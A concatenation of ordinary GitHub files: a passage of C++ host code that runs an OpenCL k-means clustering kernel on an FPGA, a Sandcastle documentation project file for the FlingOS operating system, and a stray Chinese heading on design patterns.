                    temp_feature[next_feature++] = value;
                } else {
                    // Zero padding for points past n_points.
                    temp_feature[next_feature++] = 0.0;
                }
            }
        }
    }
    return temp_feature;
}
// Run one k-means labelling iteration on the FPGA:
//   1. re-pack the current cluster centres and upload them to d_cluster,
//   2. launch the "kmeans" kernel to assign each point to a centre,
//   3. read the per-point memberships back into g_membership_OCL,
//   4. accumulate per-cluster sums and counts on the host.
// Returns the number of points whose membership changed this iteration.
// Kernel execution time is accumulated into g_t_exec via profiling events.
int FPGA_KMEANS::fpga_kmeans_compute(
    float **feature, /* in: [npoints][nfeatures] */
    int n_features,
    int n_points,
    int n_clusters,
    int *membership,
    float **clusters,
    int *new_centers_len,
    float **new_centers) {
    cl_int err;
    int delta = 0;
    int i, j;
    cl::Event wait_event;
    // Feature count padded up to a multiple of the vector width.
    int N_Features = ((n_features - 1) / g_vector_size + 1) * g_vector_size;
    DATA_TYPE *temp_clusters =
        re_align_clusters(clusters, n_clusters, N_Features, n_features);
    // Kernel arguments: feature buffer, centres, memberships, then scalars.
    int narg = 0;
    OCL_CHECK(err, err = g_kernel_kmeans.setArg(narg++, d_feature));
    OCL_CHECK(err, err = g_kernel_kmeans.setArg(narg++, d_cluster));
    OCL_CHECK(err, err = g_kernel_kmeans.setArg(narg++, d_membership));
    OCL_CHECK(err,
              err = g_kernel_kmeans.setArg(
                  narg++, sizeof(cl_int), (void *)&n_points));
    OCL_CHECK(err,
              err = g_kernel_kmeans.setArg(
                  narg++, sizeof(cl_int), (void *)&n_clusters));
    OCL_CHECK(err,
              err = g_kernel_kmeans.setArg(
                  narg++, sizeof(cl_int), (void *)&n_features));
    // Blocking upload of the freshly packed centres.
    OCL_CHECK(err,
              err = g_q.enqueueWriteBuffer(d_cluster,
                                           CL_TRUE,
                                           0,
                                           n_clusters * N_Features *
                                               sizeof(DATA_TYPE),
                                           temp_clusters,
                                           NULL,
                                           NULL));
    g_q.finish();
    free(temp_clusters);
    OCL_CHECK(err,
              err = g_q.enqueueNDRangeKernel(g_kernel_kmeans,
                                             0,
                                             cl::NDRange(WORK_GROUP, 1, 1),
                                             1,
                                             NULL,
                                             &wait_event));
    g_q.finish();
    OCL_CHECK(err, err = wait_event.wait());
    // Accumulate the measured kernel time (ns) for the final report.
    unsigned long start, stop;
    OCL_CHECK(err,
              err = wait_event.getProfilingInfo<unsigned long>(
                  CL_PROFILING_COMMAND_START, &start));
    OCL_CHECK(err,
              err = wait_event.getProfilingInfo<unsigned long>(
                  CL_PROFILING_COMMAND_END, &stop));
    g_t_exec += (stop - start);
    g_iteration++;
    // Blocking read of the new memberships.
    OCL_CHECK(err,
              err = g_q.enqueueReadBuffer(d_membership,
                                          CL_TRUE,
                                          0,
                                          n_points * sizeof(INT_DATA_TYPE),
                                          g_membership_OCL,
                                          NULL,
                                          NULL));
    g_q.finish();
    // Host-side reduction: per-cluster counts, change count, feature sums.
    delta = 0;
    for (i = 0; i < n_points; i++) {
        int cluster_id = g_membership_OCL[i];
        new_centers_len[cluster_id]++;
        if (g_membership_OCL[i] != membership[i]) {
            delta++;
            membership[i] = g_membership_OCL[i];
        }
        for (j = 0; j < n_features; j++) {
            new_centers[cluster_id][j] += feature[i][j];
        }
    }
    return delta;
}
// Host-side k-means driver: picks the initial centres, then repeatedly calls
// fpga_kmeans_compute() until fewer than `threshold` points change cluster
// or the iteration cap (1000) is hit.  Returns a newly allocated
// [nclusters][nfeatures] centre matrix (clusters[0] is the backing array);
// the caller owns and must free it.  `membership` is filled per point.
// FIX: the `initial` index pool was malloc'd but never freed (memory leak).
float **FPGA_KMEANS::fpga_kmeans_clustering(
    float **feature, /* in: [npoints][nfeatures] */
    int nfeatures,
    int npoints,
    int nclusters,
    float threshold,
    int *membership) /* out: [npoints] */
{
    int i, j, n = 0;     /* counters */
    int loop = 0, temp;  /* loop: safety cap counter */
    int *new_centers_len; /* [nclusters]: no. of points in each cluster */
    float delta;          /* number of points that changed cluster */
    float **clusters;     /* out: [nclusters][nfeatures] */
    float **new_centers;  /* [nclusters][nfeatures] accumulation buffer */
    int *initial;         /* pool of point indices not yet picked as a centre;
                             prevents picking the same point twice */
    int initial_points;
    int c = 0;            /* actual iteration count, for reporting */

    /* nclusters should never be > npoints:
       that would guarantee a cluster without points */
    if (nclusters > npoints)
        nclusters = npoints;

    /* allocate space for and initialize returning variable clusters[]
       (single backing array, row pointers into it) */
    clusters = (float **)malloc(nclusters * sizeof(float *));
    if (clusters == NULL) {
        fprintf(stderr, "Error: Failed to allocate memory for clusters\n");
        exit(EXIT_FAILURE);
    }
    clusters[0] = (float *)malloc(nclusters * nfeatures * sizeof(float));
    if (clusters[0] == NULL) {
        fprintf(stderr, "Error: Failed to allocate memory for clusters[0]\n");
        exit(EXIT_FAILURE);
    }
    for (i = 1; i < nclusters; i++)
        clusters[i] = clusters[i - 1] + nfeatures;

    /* initialize the pool of candidate centre indices */
    initial = (int *)malloc(npoints * sizeof(int));
    if (initial == NULL) {
        fprintf(stderr, "Error: Failed to allocate memory for initial\n");
        exit(EXIT_FAILURE);
    }
    for (i = 0; i < npoints; i++) {
        initial[i] = i;
    }
    initial_points = npoints;

    /* pick cluster centres from the pool, swapping each used index to the
       end so it cannot be selected again */
    for (i = 0; i < nclusters && initial_points >= 0; i++) {
        for (j = 0; j < nfeatures; j++)
            clusters[i][j] = feature[initial[n]][j]; // remapped

        temp = initial[n];
        initial[n] = initial[initial_points - 1];
        initial[initial_points - 1] = temp;
        initial_points--;
        n++;
    }
    /* the index pool is no longer needed once the centres are chosen
       (previously leaked) */
    free(initial);

    /* initialize the membership to -1 for all points */
    for (i = 0; i < npoints; i++)
        membership[i] = -1;

    /* allocate space for and initialize new_centers_len and new_centers */
    new_centers_len = (int *)calloc(nclusters, sizeof(int));
    if (new_centers_len == NULL) {
        fprintf(stderr,
                "Error: Failed to allocate memory for new_centers_len\n");
        exit(EXIT_FAILURE);
    }
    new_centers = (float **)malloc(nclusters * sizeof(float *));
    if (new_centers == NULL) {
        fprintf(stderr, "Error: Failed to allocate memory for new_centers\n");
        exit(EXIT_FAILURE);
    }
    new_centers[0] = (float *)calloc(nclusters * nfeatures, sizeof(float));
    if (new_centers[0] == NULL) {
        fprintf(stderr,
                "Error: Failed to allocate memory for new_centers[0]\n");
        exit(EXIT_FAILURE);
    }
    for (i = 1; i < nclusters; i++)
        new_centers[i] = new_centers[i - 1] + nfeatures;

    /* iterate until convergence (or the safety cap) */
    printf("\nRunning Iterations : ");
    do {
        printf(" %d ", loop + 1);
        delta = 0.0;
        delta = (float)fpga_kmeans_compute(
            feature,         /* in: [npoints][nfeatures] */
            nfeatures,       /* number of attributes for each point */
            npoints,         /* number of data points */
            nclusters,       /* number of clusters */
            membership,      /* which cluster each point belongs to */
            clusters,        /* out: [nclusters][nfeatures] */
            new_centers_len, /* out: number of points in each cluster */
            new_centers      /* sum of points in each cluster */
        );

        /* CPU side of the reduction: replace old centres with the mean of
           their assigned points, then reset the accumulators */
        for (i = 0; i < nclusters; i++) {
            for (j = 0; j < nfeatures; j++) {
                if (new_centers_len[i] > 0)
                    clusters[i][j] =
                        new_centers[i][j] /
                        new_centers_len[i]; /* take average i.e. sum/n */
                new_centers[i][j] = 0.0;    /* set back to 0 */
            }
            new_centers_len[i] = 0; /* set back to 0 */
        }
        c++;
    } while ((delta > threshold) &&
             (loop++ < 1000)); /* makes sure loop terminates */
    printf("\niterated %d times\n", c);

    free(new_centers[0]);
    free(new_centers);
    free(new_centers_len);

    return clusters;
}
// One-time OpenCL setup: pick the first Xilinx device, create a profiling
// command queue, load the FPGA binary (xclbin) and build the "kmeans"
// kernel.  Returns 0; OCL_CHECK aborts on any OpenCL error.
int FPGA_KMEANS::fpga_kmeans_init(std::string &binaryFile) {
    cl_int err;
    auto devices = xcl::get_xil_devices();
    auto device = devices[0];
    OCL_CHECK(err, g_context = cl::Context(device, NULL, NULL, NULL, &err));
    // Profiling must be enabled so fpga_kmeans_compute can time the kernel.
    OCL_CHECK(err,
              g_q = cl::CommandQueue(
                  g_context, device, CL_QUEUE_PROFILING_ENABLE, &err));
    OCL_CHECK(err,
              std::string device_name = device.getInfo<CL_DEVICE_NAME>(&err));
    auto g_fileBuf = xcl::read_binary_file(binaryFile);
    cl::Program::Binaries bins{{g_fileBuf.data(), g_fileBuf.size()}};
    devices.resize(1);
    OCL_CHECK(err, g_prog = cl::Program(g_context, devices, bins, NULL, &err));
    OCL_CHECK(err, g_kernel_kmeans = cl::Kernel(g_prog, "kmeans", &err));
    return 0;
}
// Allocate the device buffers and the host membership array.  The feature
// matrix is re-packed into the vector-blocked layout (see re_align_features)
// and copied into d_feature; d_cluster and d_membership are left
// uninitialised.  On the INT_DT build this also computes the global scale
// factor first.  Returns true; OCL_CHECK aborts on OpenCL errors.
int FPGA_KMEANS::fpga_kmeans_allocate(int n_points,
                                      int n_features,
                                      int n_clusters,
                                      float **feature) {
    cl_int err;
    DATA_TYPE *temp_feature;
#if USE_DATA_TYPE == INT_DT
    calculate_scale_factor(feature[0], n_points * n_features);
#endif
    // Pad both dimensions up to multiples of the vector width.
    int N_Features = ((n_features - 1) / g_vector_size + 1) * g_vector_size;
    int NPoints = ((n_points - 1) / g_vector_size + 1) * g_vector_size;
    temp_feature = re_align_features(
        feature, N_Features, NPoints, n_features, n_points, g_vector_size);
    // Feature buffer is initialised directly from the host copy.
    OCL_CHECK(err,
              d_feature = cl::Buffer(g_context,
                                     CL_MEM_COPY_HOST_PTR | CL_MEM_READ_WRITE,
                                     NPoints * n_features * sizeof(DATA_TYPE),
                                     temp_feature,
                                     &err));
    OCL_CHECK(err,
              d_cluster =
                  cl::Buffer(g_context,
                             CL_MEM_ALLOC_HOST_PTR | CL_MEM_READ_WRITE,
                             n_clusters * N_Features * sizeof(DATA_TYPE),
                             NULL,
                             &err));
    OCL_CHECK(err,
              d_membership =
                  cl::Buffer(g_context,
                             CL_MEM_ALLOC_HOST_PTR | CL_MEM_READ_WRITE,
                             NPoints * sizeof(INT_DATA_TYPE),
                             NULL,
                             &err));
    // Safe to free: CL_MEM_COPY_HOST_PTR copied the data at buffer creation.
    free(temp_feature);
    // Host-side scratch array for reading memberships back each iteration.
    g_membership_OCL = (INT_DATA_TYPE *)malloc(n_points * sizeof(int));
    if (g_membership_OCL == NULL) {
        fprintf(stderr,
                "Error: Failed to allocate memory for g_membership_OCL\n");
        exit(EXIT_FAILURE);
    }
    return true;
}
// Release the host-side membership scratch array allocated in
// fpga_kmeans_allocate().  Device buffers are released by their RAII wrappers.
int FPGA_KMEANS::fpga_kmeans_deallocateMemory() {
    free(g_membership_OCL);
    return true;
}
// Print a summary of the run: configured global size, number of kernel
// launches and total kernel execution time.
int FPGA_KMEANS::fpga_kmeans_print_report() {
    printf("*******************************************************\n");
    printf("\tK-means Execution Summary:\n");
    printf("*******************************************************\n");
    printf("\tGlobal Size        : %d\n", g_global_size);
    printf("\tIteration          : %d\n", g_iteration);
    // Dividing time by 1E6 to convert ns (nanoseconds) to ms (milliseconds)
    printf("\tKernel Execution Time(ms) : %f\n", g_t_exec / 1E6);
    printf("*******************************************************\n");
    return 0;
}
// Records the OpenCL global work size to use for subsequent kernel launches.
// Returns 0.
int FPGA_KMEANS::fpga_kmeans_setup(int global_size) {
    g_global_size = global_size;
    return 0;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<PropertyGroup>
<!-- The configuration and platform will be used to determine which assemblies to include from solution and
project documentation sources -->
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<SchemaVersion>2.0</SchemaVersion>
<ProjectGuid>{040b4922-9973-4bc6-b63d-11ce1389a86a}</ProjectGuid>
<SHFBSchemaVersion>1.9.9.0</SHFBSchemaVersion>
<!-- AssemblyName, Name, and RootNamespace are not used by SHFB but Visual Studio adds them anyway -->
<AssemblyName>Documentation</AssemblyName>
<RootNamespace>Documentation</RootNamespace>
<Name>Documentation</Name>
<!-- SHFB properties -->
<FrameworkVersion>.NET Framework 4.5</FrameworkVersion>
<OutputPath>.\Help\</OutputPath>
<HtmlHelpName>Documentation</HtmlHelpName>
<Language>en-US</Language>
<BuildAssemblerVerbosity>AllMessages</BuildAssemblerVerbosity>
<HelpFileFormat>Markdown</HelpFileFormat>
<IndentHtml>True</IndentHtml>
<KeepLogFile>False</KeepLogFile>
<DisableCodeBlockComponent>True</DisableCodeBlockComponent>
<CppCommentsFixup>False</CppCommentsFixup>
<CleanIntermediates>True</CleanIntermediates>
<DocumentationSources>
<DocumentationSource sourceFile="..\FlingOS.sln" xmlns="" />
</DocumentationSources>
<MissingTags>Summary, Parameter, Returns, Value, AutoDocumentCtors, Namespace, TypeParameter, IncludeTargets, AutoDocumentDispose</MissingTags>
<VisibleItems>Attributes, ExplicitInterfaceImplementations, InheritedMembers, Internals, Privates, PrivateFields, Protected, SealedProtected</VisibleItems>
<PlugInConfigurations>
</PlugInConfigurations>
<TransformComponentArguments>
<Argument Key="logoFile" Value="FlingOS-Logo-Blue.png" />
<Argument Key="logoHeight" Value="" />
<Argument Key="logoWidth" Value="100" />
<Argument Key="logoAltText" Value="Fling OS" />
<Argument Key="logoPlacement" Value="left" />
<Argument Key="logoAlignment" Value="left" />
<Argument Key="maxVersionParts" Value="" />
<Argument Key="defaultLanguage" Value="cs" />
</TransformComponentArguments>
<ComponentConfigurations>
</ComponentConfigurations>
<MaximumGroupParts>3</MaximumGroupParts>
<NamespaceGrouping>False</NamespaceGrouping>
<SyntaxFilters>C#</SyntaxFilters>
<SdkLinkTarget>Blank</SdkLinkTarget>
<RootNamespaceContainer>True</RootNamespaceContainer>
<PresentationStyle>Markdown</PresentationStyle>
<Preliminary>False</Preliminary>
<NamingMethod>MemberName</NamingMethod>
<HelpTitle>FlingOS™</HelpTitle>
<ContentPlacement>AboveNamespaces</ContentPlacement>
<NamespaceSummaries>
<NamespaceSummaryItem name="Kernel" isDocumented="True">Contains the main classes for the Fling OS kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel (Group)" isGroup="True" isDocumented="True">Contains the main namespaces for the Fling OS kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System" isDocumented="True">The kernel's System namespace that largely replaces .Net's System namespace.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.Exceptions" isDocumented="True">Contains the standard exceptions for the kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.Collections" isDocumented="True">Classes for managing collections of objects.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO" isDocumented="True">Classes for managing input/output tasks such as file handling.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.Disk" isDocumented="True">Classes for handling disks (e.g. hard-disks).</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.FAT" isDocumented="True">Classes for handling a FAT file system.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.Streams" isDocumented="True">Classes for handling streams.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.Streams.FAT" isDocumented="True">Classes for handling FAT streams such as FAT file streams.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.Stubs" isDocumented="True">Contains stubs for the FOS_System namespace.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware" isDocumented="True">The kernel's Hardware namespace contains classes that handle specific hardware.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.ATA" isDocumented="True">Contains classes for handling ATA devices.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Devices" isDocumented="True">Contains classes for generic types of hardware device e.g. DiskDevice.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.DMA" isDocumented="True">Contains classes for managing direct memory access.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.IO" isDocumented="True">Contains classes for managing I/O devices.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.PCI" isDocumented="True">Contains classes for managing PCI devices.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.USB" isDocumented="True">Contains classes for managing USB devices.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.USB.HCIs" isDocumented="True">Contains classes specifically for managing USB Host Controller Interfaces.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Utilities" isDocumented="True">Contains Kernel utility classes and functions that can be used throughout the kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System (Group)" isGroup="True" isDocumented="True">Contains namespaces related to Kernel.FOS_System and sub-namespaces.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware (Group)" isGroup="True" isDocumented="True">Contains namespaces related to Kernel.Hardware and sub-namespaces.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core (Group)" isGroup="True" isDocumented="True">Contains namespaces related to Kernel.Core and sub-namespaces.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core" isDocumented="True">Contains classes that handle core kernel functionality but which is at least 1-level abstracted from the specific hardware.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core.Consoles" isDocumented="True">Contains specific implementations of the Console class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core.Shells" isDocumented="True">Contains specific implementations of the Shell class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.CPUs" isDocumented="True">Contains specific implementations of the CPU class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Interrupts" isDocumented="True">Contains hardware-specific code for managing interrupts.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Keyboards" isDocumented="True">Contains specific implementations of the Keyboard class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Timers" isDocumented="True">Contains specific implementations of the Timer class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.USB.Devices" isDocumented="True">Contains implementations of drivers for USB devices.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.VirtMem" isDocumented="True">Contains specific implementations of virtual memory management for different architectures.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.USB (Group)" isGroup="True" isDocumented="True">Contains namespaces related to Kernel.Hardware.USB and sub-namespaces.</NamespaceSummaryItem>
<NamespaceSummaryItem name="(global)" isDocumented="True" />
<NamespaceSummaryItem name="Drivers.Compiler" isDocumented="True">Contains all libraries and classes related to the compiler which is capable of compiling both the Kernel and drivers. The Drivers Compiler replaces the Kernel Compiler and significantly improves speed and compiler architecture.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.App" isDocumented="True">Contains the command-line application and related classes which provide a command line interface to the Drivers Compiler. It is the primary point of invocation for the Drivers Compiler.</NamespaceSummaryItem>
      <NamespaceSummaryItem name="Drivers.Compiler.Architectures.x86" isDocumented="True">Contains namespaces and classes for targeting the x86 (32 bit) processor architecture.</NamespaceSummaryItem>
      <NamespaceSummaryItem name="Drivers.Compiler.Architectures.x86.ASMOps" isDocumented="True">Contains classes representing all the x86 operations used by the compiler when targeting the x86 (32-bit) architecture.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.ASM" isDocumented="True">Contains the framework for converting IL ops into ASM code and compiling that ASM code into machine code.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.Attributes" isDocumented="True">Contains attribute classes used by the compiler for identification of key classes and methods within the operating system code, such as the entrypoint and garbage collector methods.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.IL" isDocumented="True">Contains the framework for reading IL bytes, representation of IL ops and the construction and manipulation of IL methods, type tables and related aspects.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.IL.ILOps" isDocumented="True">Contains classes representing all the IL ops supported by the compiler. The classes give the root operation and list support for variants. The IL op classes are base classes containing abstract Preprocess and Convert methods which, when overridden, handle conversion of IL ops into ASM ops.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.MSBuildTask" isDocumented="True">Contains the build task implementation and related classes which provide an interface for MSBuild to the Drivers Compiler. It is a primary point of invocation for the Drivers Compiler when using automated compilation through MSBuild.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.Types" isDocumented="True">Contains classes and framework for reading an IL library and scanning the contained types for classes, methods, structures, enumerations, properties, etc. etc.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Framework" isDocumented="True">Provides a basic framework for all C# drivers to link against.</NamespaceSummaryItem>
<NamespaceSummaryItem name="ISO9660Generator" isDocumented="True">The ISO9660 Generator application is a wrapper app for Mosa's ISO9660 Generator library.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core.Processes" isDocumented="True">Contains classes related to loading and management of processes at a high-level.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core.Processes.ELF" isDocumented="True">Contains classes for loading, initialising and starting ELF executables (either as drivers or user-mode apps).</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Core.Tasks" isDocumented="True">Contains specific implementations of Tasks which are built-in sub-processes of the main kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.ISO9660" isDocumented="True">Classes for handling an ISO9660 file system.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.IO.Streams.ISO9660" isDocumented="True">Classes for handling ISO9660 streams such as ISO9660 file streams.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.FOS_System.Processes.Synchronisation" isDocumented="True">Contains implementations of widely needed synchronisation primitives such as spin-locks.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.IO.Serial" isDocumented="True">Contains classes for handling Serial ports.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Processes" isDocumented="True">Contains classes for managing processes and threads including scheduling.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Processes.IPC" isDocumented="True">Contains classes for managing inter-process communication that goes via the kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Processes.Synchronisation" isDocumented="True">Contains implementations of synchronisation primitives (that are not needed by FOS_System level classes) such as mutexes.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Tasks" isDocumented="True">Contains specific implementations of Tasks which are related directly to the hardware or hardware classes; They are built-in sub-processes of the main kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Testing" isDocumented="True">Contains classes for testing aspects of the hardware drivers.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Shared" isDocumented="True">Shared between the kernel and drivers. Contains definitions which must be the same for both kernel and drivers (such as system call numbers).</NamespaceSummaryItem>
<NamespaceSummaryItem name="TestDriver" isDocumented="True">A sample driver for testing against. Does very little but useful for testing Kernel's ELF loading and ABI.</NamespaceSummaryItem>
<NamespaceSummaryItem name="KernelABI" isDocumented="True">Contains classes for driver or application side access to the Kernel's Application Binary Interface.</NamespaceSummaryItem>
      <NamespaceSummaryItem name="Drivers.Compiler.Architectures.MIPS32" isDocumented="True">Contains namespaces and classes for targeting the MIPS (32 bit) processor architecture.</NamespaceSummaryItem>
      <NamespaceSummaryItem name="Drivers.Compiler.Architectures.MIPS32.ASMOps" isDocumented="True">Contains classes representing all the MIPS operations used by the compiler when targeting the MIPS (32-bit) architecture.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Compiler.ASM.ASMOps" isDocumented="True">Contains base class ASM ops for identifying types of ASM ops within target architecture libraries.</NamespaceSummaryItem>
<NamespaceSummaryItem name="FlingOops" isDocumented="True">The cross-platform compiler verification kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="FlingOops.x86" isDocumented="True">x86-specific implementations for supporting the testing framework.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Hardware.Exceptions" isDocumented="True">Contains exceptions used by the hardware drivers.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Debugger" isDocumented="True">Contains the portable, supporting classes for the debugger.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Debugger.App" isDocumented="True">Contains the GUI application and related classes which provide a Windows Forms-based graphical interface to the Debugger in the kernel. It is the primary point of invocation for the Debugger.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Drivers.Framework.Utilities" isDocumented="True">Utility classes for the drivers framework.</NamespaceSummaryItem>
<NamespaceSummaryItem name="FlingOops.Utilities" isDocumented="True">Utility classes used by the testing kernel.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Consoles" isDocumented="True">Contains specific implementations of the Console class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Pipes" isDocumented="True">Contains classes for managing Piped IPC.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Pipes.Exceptions" isDocumented="True">Contains classes for exceptions thrown in Piped IPC.</NamespaceSummaryItem>
      <NamespaceSummaryItem name="Kernel.Pipes.Standard" isDocumented="True">Contains classes for implementing Standard pipes for Piped IPC.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Processes" isDocumented="True">Contains classes related to loading and management of processes at a high-level.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Processes.ELF" isDocumented="True">Contains classes for loading, initialising and starting ELF executables (either as drivers or user-mode apps).</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Shells" isDocumented="True">Contains specific implementations of the Shell class.</NamespaceSummaryItem>
<NamespaceSummaryItem name="Kernel.Tasks" isDocumented="True">Contains specific implementations of Tasks which are built-in sub-processes of the main kernel.</NamespaceSummaryItem></NamespaceSummaries>
<ApiFilter>
<Filter entryType="Namespace" fullName="" isExposed="False" />
<Filter entryType="Namespace" fullName="Kernel.Debug" isExposed="False" /></ApiFilter>
<FeedbackEMailLinkText>Edward Nutting - Project Founder</FeedbackEMailLinkText>
<FeedbackEMailAddress>flingos%40outlook.com</FeedbackEMailAddress>
<CopyrightText>FlingOS™ Copyright Edward Nutting 2014-15 under GPLv2</CopyrightText>
<SccProjectName>SAK</SccProjectName>
<SccProvider>SAK</SccProvider>
<SccAuxPath>SAK</SccAuxPath>
<SccLocalPath>SAK</SccLocalPath>
<RootNamespaceTitle>FlingOS</RootNamespaceTitle>
<CopyrightHref>http://www.flingos.co.uk/License</CopyrightHref>
<FooterText>If you find any issues with the documentation, please log them here: &lt%3ba href=&quot%3bhttps://bitbucket.org/flingos/fling-os/issues&quot%3b&gt%3bProject Issue Tracker&lt%3b/a&gt%3b&lt%3bbr/&gt%3b&lt%3bbr/&gt%3b</FooterText>
</PropertyGroup>
<!-- There are no properties for these groups. AnyCPU needs to appear in order for Visual Studio to perform
the build. The others are optional common platform types that may appear. -->
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x86' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x64' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x64' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|Win32' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|Win32' ">
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)' == 'Docs' ">
<OutputPath>bin\Docs\</OutputPath>
</PropertyGroup>
<ItemGroup>
<Folder Include="icons\" />
<Folder Include="Specs" />
<Folder Include="Conceptual" />
<Folder Include="Conceptual\Kernel Compiler" />
<Folder Include="Conceptual\Kernel Compiler\Architecture" />
<Folder Include="Conceptual\Kernel" />
<Folder Include="Conceptual\Kernel Debugger\" />
<Folder Include="Conceptual\Kernel\Handling CS Standard Libraries" />
</ItemGroup>
<ItemGroup>
<None Include="Docs.licenseheader" />
<None Include="Conceptual\Kernel Compiler\Architecture\Processing Flow Details.aml" />
<None Include="Conceptual\Kernel\Handling CS Standard Libraries\Approach 1 - DIY.aml" />
<None Include="Conceptual\Kernel\Handling CS Standard Libraries\Approach 2 - Plugs.aml" />
<None Include="Conceptual\Kernel\Kernel.aml" />
<None Include="Specs\XML Comment Specifications.aml" />
</ItemGroup>
<ItemGroup>
<Content Include="icons\FlingOS-Logo-Blue.png">
<ImageId>FlingOS-Logo-Blue</ImageId>
<AlternateText>FlingOS-Logo-Blue</AlternateText>
</Content>
<Image Include="Conceptual\Kernel Compiler\Architecture\Fling OS - Kernel Compiler Model 1.png">
<ImageId>Fling OS - Kernel Compiler Model 1</ImageId>
<AlternateText>Fling OS - Kernel Compiler Model 1</AlternateText>
</Image>
<Image Include="Conceptual\Kernel Debugger\Fling OS - Debug Architecture.png">
<ImageId>Fling OS - Debug Architecture</ImageId>
<AlternateText>Fling OS - Debug Architecture</AlternateText>
</Image>
</ItemGroup>
<!-- Import the SHFB build targets -->
<Import Project="$(SHFBROOT)\SandcastleHelpFileBuilder.targets" />
</Project> | {
"pile_set_name": "Github"
} |
## 设计模式
